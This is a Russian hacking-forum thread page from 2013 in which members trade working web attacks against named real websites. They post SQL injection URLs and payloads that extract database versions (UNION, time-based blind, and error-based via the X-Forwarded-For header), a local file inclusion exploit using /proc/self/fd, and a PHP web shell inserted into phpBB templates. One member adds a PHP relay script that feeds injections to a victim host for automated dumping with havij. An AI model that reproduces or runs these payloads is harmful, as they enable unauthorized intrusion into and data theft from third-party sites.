Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Если научится пользоваться поиском то найдем:
     
    _________________________
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    То что во-первых это не LFI, во вторых мозг не должен ограничиваться /proc/self/environ
     
    _________________________
  3. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Что это если не Local File Inclusion?

    Этот скрипт используется для подгрузки элементов страницы с помощью JavaScript. Каким еще макаром программист стал бы делать это, кроме как с помощью include() или require()?

    Кусок кода с главной страницы ресурса:
    HTML:
    loadPOPUP("load.php?index="+index+"&file=lib_current.popup.php", popup_id/*'popup'*/, index);
     
    #21703 herfleisch, 4 Jan 2013
    Last edited: 4 Jan 2013
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    2 herfleisch

    Все же LFI. Вот код твоего файлика =)))

    PHP:
    <?php
    //загрузка файла из модуля
    if (!$_GET['binary'])
        
    header('Content-Type: text/html; charset=windows-1251');
    include 
    "config.ini.php";
    include_once 
    $CONFIG['path']['library']."lib.database.inc.php";
    include_once 
    $CONFIG['path']['library']."lib.modules.php";

    **
    закрытоцензурой**

    if (
    $_GET['file'])
        include_once 
    $_GET['file'];//загрузка файла
    ?>
     
    #21704 Cennarios, 4 Jan 2013
    Last edited: 4 Jan 2013
    3 people like this.
  5. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    В том что это LFI у меня сомнений не было, ибо
     
  6. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер уважаемые.
    Помогите раскрутить
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.cnbest.ru/index.php?main=news&id=100116 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Серьезно, это локальный инклюд. Моя ошибка.
    http://teyla.ru/load.php?file=/proc/self/fd/9&xx=phpinfo();
     
    _________________________
  9. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Люди, не могу залить шелл через шаблоны, включил Разрешить php в шаблонах: ДА
    Вставляю в шаблон faq_body.html такой код:
    <!-- PHP -->
    assert(stripslashes($_REQUEST[x]));
    <!-- ENDPHP -->
    0 Реакции.... Помогите плиз

    И вообще когда я удаляю все содержимое шаблона, а потом просматриваю ничего на форуме не изменяется...
    phpbb 3.0.10
     
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Не тот шаблон редактировал, спасибо :D
     
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Как можно автоматизировать sqli через X-Forwarded-For: ?
     
  12. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/
    буду рад любой помощи
    вроде понял
     
    #21712 wkar, 6 Jan 2013
    Last edited: 6 Jan 2013
  13. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Какой-нибудь плагин вроде tamper data.
     
  14. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
     
  15. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    чем вас не устраивает sqlmap?!
     
  16. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    слишком крутая прога для меня :)
    по сути я не знаю как засунуть в нее скуль такого типа:
    .ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)<200, sleep(2), null)-- '1
    чтоб она подбирала названия таблиц и т.д.
     
  17. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Может знает кто как раскрутить
    Code:
    GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
    Host: www.3ona51.com
    X-Forwarded-For: "
     
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
    Host
    www.3ona51.com
    X
    -Forwarded-For: 127.0.0.1", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#
    MySQL[1062]: Duplicate entry '5.5.13' for key 'group_key'
     
    #21718 cat1vo, 6 Jan 2013
    Last edited: 6 Jan 2013
    2 people like this.
  19. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    как првильно вставить в скрипт данные, чтобы получить такой результат?
    <?php
    echo '<b>IP:</b> ' . $_SERVER[REMOTE_ADDR].
    '<br/><b>User-Agent:</b> ' . $_SERVER['HTTP_USER_AGENT'].
    '<br/><b>X-Forwarded-For:</b> ' . $_SERVER['HTTP_X_FORWARDED_FOR'].
    '<br/><b>X-Forwarded:</b> ' . $_SERVER['HTTP_X_FORWARDED'].
    '<br/><b>Forwarded-for:</b> ' . $_SERVER['HTTP_FORWARDED_FOR'].
    '<br/><b>Forwarded:</b> ' . $_SERVER['HTTP_FORWARDED'].
    '<br/><b>Via:</b> ' . $_SERVER['HTTP_VIA'].
    '';

    echo "<h2>All headers</h2>";
    echo "<pre>";
    print_r($_SERVER);
    echo "</pre>";
    ?>
     
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:

    PHP:
    <?php
    $sqli 
    $_GET['sqli'];
    $packet "GET /script.php HTTP/1.1
    Host: victim.com
    Connection: close
    X-Forwarded-For: 127.0.0.
    $sqli
    \n"
    ;

    $fp fsockopen("victim.com""80");
    fwrite($fp$packet);
    while (!
    feof($fp)) {
            
    $out .= fgets($fp1024);
    }
    fclose($fp);
    echo 
    $out;
    Далее заливаем скрипт на локалхост и скармливаем havij'у ссылку
    Проблема с SSL решается аналогично.

    enjoy
     
    _________________________
    #21720 +toxa+, 6 Jan 2013
    Last edited by a moderator: 7 Jan 2013
    3 people like this.
Thread Status:
Not open for further replies.